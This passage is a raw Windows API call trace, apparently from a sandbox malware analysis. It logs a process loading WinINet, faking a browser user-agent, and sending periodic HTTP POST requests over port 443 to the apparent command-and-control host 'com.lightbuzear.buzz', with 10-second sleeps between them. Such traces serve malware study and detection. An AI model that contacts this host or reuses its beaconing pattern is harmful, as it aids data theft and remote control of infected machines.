(HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6e0 [0268.894] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0268.894] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480efd8 [0268.894] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0268.894] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ef00 [0268.894] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480efd8 | out: hHeap=0x4780000) returned 1 [0268.894] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0268.894] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef00 | out: hHeap=0x4780000) returned 1 [0268.894] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48009b0 [0268.894] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0268.894] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbda0 [0268.894] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48009b0 | out: hHeap=0x4780000) returned 1 [0268.894] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48009b0 [0268.895] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba20 [0268.895] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48009d8 [0268.895] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0268.896] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbda0 | out: hHeap=0x4780000) returned 1 [0268.896] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0268.896] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0268.896] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48009d8 | out: hHeap=0x4780000) returned 1 [0268.896] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0268.897] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0268.897] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0268.897] FreeLibrary (hLibModule=0x71570000) returned 1 [0268.897] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0268.897] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0268.897] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800848 | out: hHeap=0x4780000) returned 1 [0268.898] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48007a8 | out: hHeap=0x4780000) returned 1 [0268.898] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48008c0 | out: hHeap=0x4780000) returned 1 [0268.899] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800f28 | out: hHeap=0x4780000) returned 1 [0268.899] Sleep (dwMilliseconds=0x2710) [0268.955] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce740 [0268.956] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce730 [0268.956] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0268.956] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6c0 [0268.956] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0268.956] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0268.956] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0268.956] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0268.956] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0268.956] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ee10 [0268.956] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0268.956] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480eeb8 [0268.956] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ee10 | out: hHeap=0x4780000) returned 1 [0268.956] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0268.956] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eeb8 | out: hHeap=0x4780000) returned 1 [0268.956] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480f050 [0268.956] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800f28 [0268.957] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800f28 | out: hHeap=0x4780000) returned 1 [0268.957] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0268.957] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800f28 [0268.957] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0268.958] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce630 [0268.958] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce600 [0268.958] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0268.958] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0268.958] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0268.958] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce750 [0268.958] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0268.958] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6b0 [0268.958] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0268.958] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480eea0 [0268.958] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0268.958] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ef30 [0268.958] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eea0 | out: hHeap=0x4780000) returned 1 [0268.958] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0268.958] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef30 | out: hHeap=0x4780000) returned 1 [0268.958] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48009d8 [0268.958] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0268.958] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba58 [0268.959] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48009d8 | out: hHeap=0x4780000) returned 1 [0268.959] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48008c0 [0268.959] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba90 [0268.959] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48009d8 [0268.960] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba90 | out: hHeap=0x4780000) returned 1 [0268.960] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba58 | out: hHeap=0x4780000) returned 1 [0268.960] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0268.960] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0268.960] FreeLibrary (hLibModule=0x71780000) returned 1 [0268.961] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48009d8 | out: hHeap=0x4780000) returned 1 [0268.961] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0268.961] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800578 [0268.961] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0268.962] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0268.962] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0268.962] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0268.962] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce690 [0268.962] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0268.962] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6a0 [0268.962] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0268.962] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0268.962] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0268.962] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ef60 [0268.963] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0268.963] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f020 [0268.963] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef60 | out: hHeap=0x4780000) returned 1 [0268.963] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0268.963] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f020 | out: hHeap=0x4780000) returned 1 [0268.963] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480ee10 [0268.963] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48009d8 [0268.963] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48009d8 | out: hHeap=0x4780000) returned 1 [0268.965] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0268.965] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800848 [0268.965] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0268.966] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48009d8 [0268.966] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0268.966] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce610 [0268.966] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0268.966] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce600 [0268.966] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0268.966] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6a0 [0268.966] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0268.966] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0268.966] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0268.966] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ee28 [0268.966] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0268.966] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ef78 [0268.966] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ee28 | out: hHeap=0x4780000) returned 1 [0268.966] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0268.966] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef78 | out: hHeap=0x4780000) returned 1 [0268.966] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480f038 [0268.966] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48007a8 [0268.967] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48007a8 | out: hHeap=0x4780000) returned 1 [0268.967] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0268.967] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0268.967] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0268.967] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5b0 [0268.967] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0268.967] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0268.968] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0268.968] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce690 [0268.968] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0268.968] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce620 [0268.968] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0268.968] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ef90 [0268.968] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0268.968] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480eea0 [0268.968] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef90 | out: hHeap=0x4780000) returned 1 [0268.968] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0268.968] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eea0 | out: hHeap=0x4780000) returned 1 [0268.968] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800a00 [0268.968] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0268.968] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0268.968] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800a00 | out: hHeap=0x4780000) returned 1 [0268.968] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48005a0 [0268.968] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbda0 [0268.968] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800a00 [0268.969] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbda0 | out: hHeap=0x4780000) returned 1 [0268.969] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0268.969] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0268.970] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0268.970] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800a00 | out: hHeap=0x4780000) returned 1 [0268.970] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5f0 [0268.970] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce570 [0268.970] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0268.970] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0268.970] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0268.970] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0268.970] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0268.970] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce730 [0268.970] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0268.970] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480efd8 [0268.971] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0268.971] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480edb0 [0268.971] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480efd8 | out: hHeap=0x4780000) returned 1 [0268.971] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0268.971] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480edb0 | out: hHeap=0x4780000) returned 1 [0268.971] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48007a8 [0268.971] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0268.971] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb898 [0268.971] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48007a8 | out: hHeap=0x4780000) returned 1 [0268.971] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48007a8 [0268.971] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbf28 [0268.971] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800a00 [0268.972] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0268.972] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0268.972] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0268.972] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0270.066] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800a00 | out: hHeap=0x4780000) returned 1 [0270.066] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6c0 [0270.066] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce620 [0270.067] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0270.067] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce680 [0270.067] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5c0 [0270.067] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0270.067] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce640 [0270.067] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0270.067] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0270.067] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0270.067] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce610 [0270.067] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0270.067] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ef90 [0270.067] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0270.067] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ef78 [0270.067] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef90 | out: hHeap=0x4780000) returned 1 [0270.067] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0270.067] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef78 | out: hHeap=0x4780000) returned 1 [0270.067] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800a00 [0270.068] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0270.068] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0270.068] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800a00 | out: hHeap=0x4780000) returned 1 [0270.068] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800a00 [0270.068] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbf28 [0270.068] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48005c8 [0270.068] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0270.069] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0270.069] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0270.069] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0270.070] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48005c8 | out: hHeap=0x4780000) returned 1 [0270.070] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0270.070] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6f0 [0270.070] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6d0 [0270.070] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0270.070] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce630 [0270.070] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0270.070] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5f0 [0270.070] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0270.070] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0270.070] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0270.070] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480edb0 [0270.070] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0270.070] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ef00 [0270.070] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480edb0 | out: hHeap=0x4780000) returned 1 [0270.070] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0270.071] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef00 | out: hHeap=0x4780000) returned 1 [0270.071] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48005c8 [0270.071] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0270.071] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0270.071] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48005c8 | out: hHeap=0x4780000) returned 1 [0270.071] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48005c8 [0270.071] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd68 [0270.071] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48005f0 [0270.072] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd68 | out: hHeap=0x4780000) returned 1 [0270.072] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0270.072] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0270.072] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0270.073] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48005f0 | out: hHeap=0x4780000) returned 1 [0270.079] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0270.079] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0270.079] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0270.079] FreeLibrary (hLibModule=0x71570000) returned 1 [0270.080] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0270.080] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0270.080] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, 